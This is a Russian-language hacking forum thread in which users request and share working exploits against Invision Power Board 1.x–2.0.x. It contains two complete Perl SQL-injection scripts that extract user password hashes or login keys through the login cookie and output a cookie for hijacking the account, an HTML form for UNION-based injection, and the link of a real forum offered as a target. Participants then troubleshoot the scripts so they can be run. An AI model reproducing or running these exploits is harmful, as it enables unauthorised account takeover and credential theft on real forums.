Сколько не искал, не нашел ни одного рабочего сплойта на 1.3 Final.
Может подкините рабочий сплойт?
Сразу оговорюсь, в перле я не силен...

SQL-Injection в Invision Power Board
Уязвимые версии: все
Степень опасности: высокая
Описание: Возможен посимвольный перебор в базе данных пользователей. С чем успешно справляется эксплоит, выдавая хеш заданного пользователя.

Эксплоит:

#!/usr/bin/perl -w ################################################## ################ # This one actually works :) Just paste the outputted cookie into # your request header using livehttpheaders or something and you # will probably be logged in as that user. No need to decrypt it! # Exploit coded by "ReMuSOMeGa & Nova" and http://www.h4cky0u.org ################################################## ################ use LWP::UserAgent; $ua = new LWP::UserAgent; $ua->agent("Mosiac 1.0" . $ua->agent); if (!$ARGV[0]) {$ARGV[0] = '';} if (!$ARGV[3]) {$ARGV[3] = '';} my $path = $ARGV[0] . '/index.php?act=Login&CODE=autologin'; my $user = $ARGV[1]; # userid to jack my $iver = $ARGV[2]; # version 1 or 2 my $cpre = "";#$ARGV[3]; # cookie prefix my $dbug ="";#$ARGV[4]; # debug? my $lang=$ARGV[3]; # eng/rus if (!$ARGV[2]) { print "..By ReMuSoMeGa & Nova. Usage: ipb.pl http://forums.site.org [id] [ver 1/2] [lang=eng/rus].\n\n"; exit; } my @charset = ("0","1","2","3","4","5","6","7","8","9","a","b","c","d","e","f"); my $outputs = ''; print "Using lang=$lang\n"; print " \t[ 0 1 2 3 4 5 6 7 8 9 a b c d e f ]\n"; for( $i=1; $i < 33; $i++ ) { print "Dig $i\t[ "; for( $j=0; $j < 16; $j++ ) { my $current = $charset[$j]; my $sql = ( $iver >2 ) ? "99%2527+OR+(id%3d$user+AND+MID(password,$i,1)%3d%2 527$current%2527)/*" : "99%2527+OR+(id%3d$user+AND+MID(member_login_key,$i ,1)%3d%2527$current%2527)/*"; my @cookie = ('Cookie' => $cpre . "member_id=31337420; " . $cpre . "pass_hash=" . $sql); my $res = $ua->get($path, @cookie); # If we get a valid sql request then this # does not appear anywhere in the sources if($lang eq "rus") { $pattern = '<title>(.*)Вход(.*)</title>'; } #add your languages here else { $pattern = '<title>(.*)Log In(.*)</title>'; } $_ = $res->content; # if ($dbug) { print }; if ( !(/$pattern/) ) { $outputs .= $current; print "$current "; last; } else {print ". ";}#print" Attempt #$current failed\n";} } print "\n"; if ( length($outputs) < 1 ) { print "Not Exploitable!\n"; exit; } } print "Cookie: " . $cpre . "member_id=" . $user . ";" . $cpre . "pass_hash=" . $outputs; exit;
Производитель: Invision Board
Источник: SecurityLab

1.) http://[victim]/index.php?act=portal&site=[code]


2.)<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head>
<body>
<form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.valu e+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url'
value='http://forum.target.com'><br><br>
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'
value='SELECT * FROM ibf_calendar_events'><br><br>
<u>Attention :</u> The request result MUST have this structure :<br><br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,IN T,INT,CHAR(2),INT,INT,
INT,INT,STR,STR<br><br>
<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>
<br><br><br>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html"
target="_blank">
Security-Corporation.com</a></p>
</body>
</html>

Спасибо Smith, а как его в человеческий вид привести?

1.) http://[victim]/index.php?act=portal&site=[code]


2.)<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head>
<body>
<form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.valu e+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url'
value='http://forum.target.com'><br><br>
<b>SQL SELECT REQUEST :</b> <input type='text' size='80' name='request'
value='SELECT * FROM ibf_calendar_events'><br><br>
<u>Attention :</u> The request result MUST have this structure :<br><br>
INT,INT,INT,INT,INT,STR,STR,STR,INT,INT,INT,INT,IN T,INT,CHAR(2),INT,INT,
INT,INT,STR,STR<br><br>
<input type='hidden' name='y' value='2004'>
<input type='hidden' name='m'>
<input type='submit' value='Execute'>
</form>
<br><br><br>
<p align="right">A patch can be found on <a
href="http://www.phpsecure.info" target="_blank">phpSecure.info</a>.<br>
For more informations about this exploit :
<a href="http://www.security-corporation.com/advisories-025.html"
target="_blank">
Security-Corporation.com</a></p>
</body>
</html>
А с этим что делать?
Я ввел урл, скачался php код какойто
а что с ним дальше делать?

http://[victim]/index.php?act=portal&site=[code]
А что писать вместо [code]

Вот неплохой сплойт :
http://rst.void.ru/download/r57ipb2.txt
З.ы:Только подправить его надо...:)

В первом посте я честно написал о перле...)
ps
Этот сплойт у меня есть в исправленном виде.

Ссылочку на форум скинь .

Держи _http://www.board123.com/forums/index.php?mforum=Cricket

как второй вариант использовать, не совсем понимаю.

Какой второй вот рабочий сплоит:
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7 2%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}

перла на работе нема -( я спрашиваю про это

2.)<html>
<head><title>
Invision Power Board Free 1.3 FINAL SQL Injection Problems
</title></head>
<body>
<form action='/index.php?act=calendar' method='post'
onsubmit="this.m.value='2 )) UNION
'+this.request.value+'#';this.action=this.url.valu e+this.action;">
<b>IPB directory URL :</b> <input type='text' size='45' name='url'
value='http://forum.target.com'><br><br>

Какой второй вот рабочий сплоит:
#!/usr/bin/perl

## Invision Power Board SQL injection exploit by RST/GHC
## vulnerable forum versions : 1.* , 2.* (<2.0.4)
## tested on version 1.3 Final and version 2.0.2
## * work on all mysql versions
## * work with magic_quotes On (use %2527 for bypass magic_quotes_gpc = On)
## (c)oded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## screen:
## ~~~~~~~
## r57ipb2.pl blah.com /ipb13/ 1 0
## [~] SERVER : blah.com
## [~] PATH : /ipb13/
## [~] MEMBER ID : 1
## [~] TARGET : 0 - IPB 1.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## PASSWORD : 5f4dcc3b5aa765d61d8327deb882cf99
##
## r57ipb2.pl blah.com /ipb202/ 1 1
## [~] SERVER : blah.com
## [~] PATH : /ipb202/
## [~] MEMBER ID : 1
## [~] TARGET : 1 - IPB 2.*
## [~] SEARCHING PASSWORD ... [ DONE ]
##
## MEMBER ID : 1
## MEMBER_LOGIN_KEY : f14c54ff6915dfe3827c08f47617219d
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Greets: James Bercegay of the GulfTech Security Research Team
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~
## Credits: RST/GHC , http://rst.void.ru , http://ghc.ru
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~

use IO::Socket;

if (@ARGV < 4) { &usage; }

$server = $ARGV[0];
$path = $ARGV[1];
$member_id = $ARGV[2];
$target = $ARGV[3];

$pass = ($target)?('member_login_key'):('password');

$server =~ s!(http:\/\/)!!;

$request = 'http://';
$request .= $server;
$request .= $path;

$s_num = 1;
$|++;
$n = 0;

print "[~] SERVER : $server\r\n";
print "[~] PATH : $path\r\n";
print "[~] MEMBER ID : $member_id\r\n";
print "[~] TARGET : $target";
print (($target)?(' - IPB 2.*'):(' - IPB 1.*'));
print "\r\n";
print "[~] SEARCHING PASSWORD ... [|]";

($cmember_id = $member_id) =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;

while(1)
{
if(&found(47,58)==0) { &found(96,122); }
$char = $i;
if ($char=="0")
{
if(length($allchar) > 0){
print qq{\b\b DONE ]

MEMBER ID : $member_id
};
print (($target)?('MEMBER_LOGIN_KEY : '):('PASSWORD : '));
print $allchar."\r\n";
}
else
{
print "\b\b FAILED ]";
}
exit();
}
else
{
$allchar .= chr($i);
}
$s_num++;
}

sub found($$)
{
my $fmin = $_[0];
my $fmax = $_[1];
if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }

$r = int($fmax - ($fmax-$fmin)/2);
$check = " BETWEEN $r AND $fmax";
if ( &check($check) ) { &found($r,$fmax); }
else { &found($fmin,$r); }
}

sub crack($$)
{
my $cmin = $_[0];
my $cmax = $_[1];
$i = $cmin;
while ($i<$cmax)
{
$crcheck = "=$i";
if ( &check($crcheck) ) { return $i; }
$i++;
}
$i = 0;
return $i;
}

sub check($)
{
$n++;
status();
$ccheck = $_[0];
$pass_hash1 = "%36%36%36%2527%20%4F%52%20%28%69%64%3D";
$pass_hash2 = "%20%41%4E%44%20%61%73%63%69%69%28%73%75%62%73%74%7 2%69%6E%67%28";
$pass_hash3 = $pass.",".$s_num.",1))".$ccheck.") /*";
$pass_hash3 =~ s/(.)/"%".uc(sprintf("%2.2x",ord($1)))/eg;
$nmalykh = "%20";
$socket = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");

printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",
$path,$server,$cmember_id,$pass_hash1,$cmember_id, $pass_hash2,$pass_hash3,$nmalykh);

while(<$socket>)
{
if (/Set-Cookie: session_id=0;/) { return 1; }
}

return 0;
}

sub status()
{
$status = $n % 5;
if($status==0){ print "\b\b/]"; }
if($status==1){ print "\b\b-]"; }
if($status==2){ print "\b\b\\]"; }
if($status==3){ print "\b\b|]"; }
}

sub usage()
{
print q(
Invision Power Board v < 2.0.4 SQL injection exploit
----------------------------------------------------
USAGE:
~~~~~~
r57ipb2.pl [server] [/folder/] [member_id] [target]

[server] - host where IPB installed
[/folder/] - folder where IPB installed
[member_id] - user id for brute

targets:
0 - IPB 1.*
1 - IPB 2.* (Prior To 2.0.4)

e.g. r57ipb2.pl 127.0.0.1 /IPB/ 1 1
----------------------------------------------------
(c)oded by 1dt.w0lf
RST/GHC , http://rst.void.ru , http://ghc.ru
);
exit();
}

если пытаюся этим эксплоитом выдает такую ошибку

Can't use an undefined value as a symbol reference line 134

Помнится мне он эту ошибку выдает когда неправильно введены данные

Помнится мне он эту ошибку выдает когда неправильно введены данные
данные правильно вводятся =
( вот думаю мож пропатчен.
смущает ента строка
printf $socket ("GET %sindex.php?act=Login&CODE=autologin HTTP/1.0\nHost: %s\nAccept: */*\nCookie: member_id=%s; pass_hash=%s%s%s%s%s\nConnection: close\n\n",

Выводит эксплоит или форум?
Если эксплоит, это синтаксическая ошибка, значит

https://forum.antichat.ru/showthread.php?t=16405 Раз тема на форуме
https://forum.antichat.ru/showthread.php?t=5507 - Два тема на форуме

Закрепленная тема на форуме:
https://forum.antichat.ru/thread15678.html

и т.д.. (Вопрос неоднократно поднимался на форуме, и мусолился)

Эта тема закрываецца, автору -3 бала.